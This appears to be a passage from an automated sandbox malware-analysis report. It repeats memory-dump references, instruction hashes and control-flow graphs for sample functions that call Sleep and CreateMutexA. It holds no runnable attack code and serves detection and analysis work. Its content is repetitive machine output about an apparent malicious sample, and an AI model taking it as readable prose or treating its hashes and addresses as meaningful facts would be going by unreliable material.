                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766361943.00000000000B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766392814.00000000000BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766425098.00000000000C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766597542.0000000000220000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766617765.0000000000222000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766671631.0000000000235000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766691132.0000000000237000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766710949.0000000000238000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766710949.0000000000243000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766745801.0000000000247000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766765521.0000000000248000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766789322.0000000000256000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766806533.000000000025C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766827383.0000000000272000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766846764.0000000000273000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766867055.000000000027B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766886363.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766903399.0000000000281000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766925111.0000000000288000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766949731.00000000002A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766967269.00000000002AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766984198.00000000002AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767005534.00000000002B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767026003.00000000002C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767043084.00000000002C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767062597.00000000002D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767084322.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767104813.00000000002D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767121901.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767140293.00000000002DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767160553.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767183483.00000000002F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767201271.00000000002F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767219302.00000000002F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767235186.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767251872.00000000002FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767311355.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767327621.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767342569.000000000034F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767357466.0000000000352000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767375043.0000000000354000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767392869.0000000000362000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767408780.0000000000363000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767424419.0000000000364000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767439354.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                • Opcode ID: 6b34dbf020dabad82c68a31b48c4f9406d09070b0085bcd70b6b39c5af1631b0
                                                                                                                                                                                                                                • Instruction ID: 68cdb2be17ced153299bb8750355a1041719d7973312b1c7fcdb482a2f9d75af
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6b34dbf020dabad82c68a31b48c4f9406d09070b0085bcd70b6b39c5af1631b0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3C315B31700244DBEB18DB7CDC897AEB7A2EF86312F248719E814DB3D5C77599888752

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 275 5a079-5a099 279 5a0c7-5a0e3 275->279 280 5a09b-5a0a7 275->280 283 5a0e5-5a0f1 279->283 284 5a111-5a130 279->284 281 5a0bd-5a0c4 call 6d663 280->281 282 5a0a9-5a0b7 280->282 281->279 282->281 285 5a930 282->285 287 5a107-5a10e call 6d663 283->287 288 5a0f3-5a101 283->288 289 5a132-5a13e 284->289 290 5a15e-5a916 call 680c0 284->290 293 5a953-5a994 Sleep CreateMutexA 285->293 294 5a930 call 86c6a 285->294 287->284 288->285 288->287 296 5a154-5a15b call 6d663 289->296 297 5a140-5a14e 289->297 305 5a9a7-5a9a8 293->305 306 5a996-5a998 293->306 294->293 296->290 297->285 297->296 306->305 307 5a99a-5a9a5 306->307 307->305
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 0005A963
                                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,000B3254), ref: 0005A981
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765048941.0000000000050000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765112724.00000000000B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766361943.00000000000B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766392814.00000000000BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766425098.00000000000C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766597542.0000000000220000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766617765.0000000000222000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766671631.0000000000235000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766691132.0000000000237000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766710949.0000000000238000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766710949.0000000000243000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766745801.0000000000247000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766765521.0000000000248000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766789322.0000000000256000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766806533.000000000025C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766827383.0000000000272000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766846764.0000000000273000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766867055.000000000027B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766886363.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766903399.0000000000281000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766925111.0000000000288000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766949731.00000000002A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766967269.00000000002AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766984198.00000000002AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767005534.00000000002B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767026003.00000000002C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767043084.00000000002C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767062597.00000000002D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767084322.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767104813.00000000002D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767121901.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767140293.00000000002DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767160553.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767183483.00000000002F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767201271.00000000002F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767219302.00000000002F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767235186.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767251872.00000000002FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767311355.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767327621.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767342569.000000000034F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767357466.0000000000352000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767375043.0000000000354000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767392869.0000000000362000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767408780.0000000000363000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767424419.0000000000364000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767439354.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                • Opcode ID: 8924c4dd57d97b84ab042c4cecfb3d31f600929db512929d3e9a61a8e9f58ee0
                                                                                                                                                                                                                                • Instruction ID: a25139e619dfdbc413ee77033291d36146d8e537c6292248b815b566b9aa4b86
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8924c4dd57d97b84ab042c4cecfb3d31f600929db512929d3e9a61a8e9f58ee0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 43314A31B101449BEF189B78DC897AEB762DB83312F204719E814DB3D5C77599848767

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 309 5a1ae-5a1ce 313 5a1d0-5a1dc 309->313 314 5a1fc-5a218 309->314 315 5a1f2-5a1f9 call 6d663 313->315 316 5a1de-5a1ec 313->316 317 5a246-5a265 314->317 318 5a21a-5a226 314->318 315->314 316->315 319 5a935 316->319 323 5a267-5a273 317->323 324 5a293-5a916 call 680c0 317->324 321 5a23c-5a243 call 6d663 318->321 322 5a228-5a236 318->322 327 5a953-5a994 Sleep CreateMutexA 319->327 328 5a935 call 86c6a 319->328 321->317 322->319 322->321 330 5a275-5a283 323->330 331 5a289-5a290 call 6d663 323->331 339 5a9a7-5a9a8 327->339 340 5a996-5a998 327->340 328->327 330->319 330->331 331->324 340->339 341 5a99a-5a9a5 340->341 341->339
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 0005A963
                                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,000B3254), ref: 0005A981
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765048941.0000000000050000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765112724.00000000000B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766361943.00000000000B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766392814.00000000000BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766425098.00000000000C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766597542.0000000000220000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766617765.0000000000222000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766671631.0000000000235000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766691132.0000000000237000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766710949.0000000000238000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766710949.0000000000243000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766745801.0000000000247000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766765521.0000000000248000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766789322.0000000000256000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766806533.000000000025C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766827383.0000000000272000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766846764.0000000000273000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766867055.000000000027B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766886363.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766903399.0000000000281000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766925111.0000000000288000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766949731.00000000002A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766967269.00000000002AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766984198.00000000002AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767005534.00000000002B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767026003.00000000002C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767043084.00000000002C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767062597.00000000002D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767084322.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767104813.00000000002D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767121901.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767140293.00000000002DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767160553.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767183483.00000000002F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767201271.00000000002F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767219302.00000000002F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767235186.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767251872.00000000002FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767311355.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767327621.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767342569.000000000034F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767357466.0000000000352000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767375043.0000000000354000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767392869.0000000000362000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767408780.0000000000363000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767424419.0000000000364000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767439354.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                • Opcode ID: fa7e48265b2f7ef512384e8e17884a04751e1bb14fbea1c46ae0c0fc4afec432
                                                                                                                                                                                                                                • Instruction ID: 6085ec9b149a200cef5c48ecc8b218efe6534ccc1ec6c07637c3ad305c4be588
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fa7e48265b2f7ef512384e8e17884a04751e1bb14fbea1c46ae0c0fc4afec432
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9A312C31B002409BEB18DB7CDC897AFB762EB87312F244719E414DB3D5D77599848762

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 343 5a418-5a438 347 5a466-5a482 343->347 348 5a43a-5a446 343->348 351 5a484-5a490 347->351 352 5a4b0-5a4cf 347->352 349 5a45c-5a463 call 6d663 348->349 350 5a448-5a456 348->350 349->347 350->349 355 5a93f-5a949 call 86c6a * 2 350->355 357 5a4a6-5a4ad call 6d663 351->357 358 5a492-5a4a0 351->358 353 5a4d1-5a4dd 352->353 354 5a4fd-5a916 call 680c0 352->354 359 5a4f3-5a4fa call 6d663 353->359 360 5a4df-5a4ed 353->360 374 5a94e-5a994 call 86c6a Sleep CreateMutexA 355->374 375 5a949 call 86c6a 355->375 357->352 358->355 358->357 359->354 360->355 360->359 379 5a9a7-5a9a8 374->379 380 5a996-5a998 374->380 375->374 380->379 381 5a99a-5a9a5 380->381 381->379
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 0005A963
                                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,000B3254), ref: 0005A981
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765048941.0000000000050000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765112724.00000000000B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766361943.00000000000B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766392814.00000000000BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766425098.00000000000C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766597542.0000000000220000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766617765.0000000000222000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766671631.0000000000235000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766691132.0000000000237000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766710949.0000000000238000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766710949.0000000000243000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766745801.0000000000247000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766765521.0000000000248000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766789322.0000000000256000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766806533.000000000025C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766827383.0000000000272000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766846764.0000000000273000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766867055.000000000027B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766886363.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766903399.0000000000281000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766925111.0000000000288000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766949731.00000000002A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766967269.00000000002AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766984198.00000000002AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767005534.00000000002B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767026003.00000000002C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767043084.00000000002C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767062597.00000000002D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767084322.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767104813.00000000002D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767121901.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767140293.00000000002DA000.00000080.00000001.01000000.00000003.sdmpDownload File
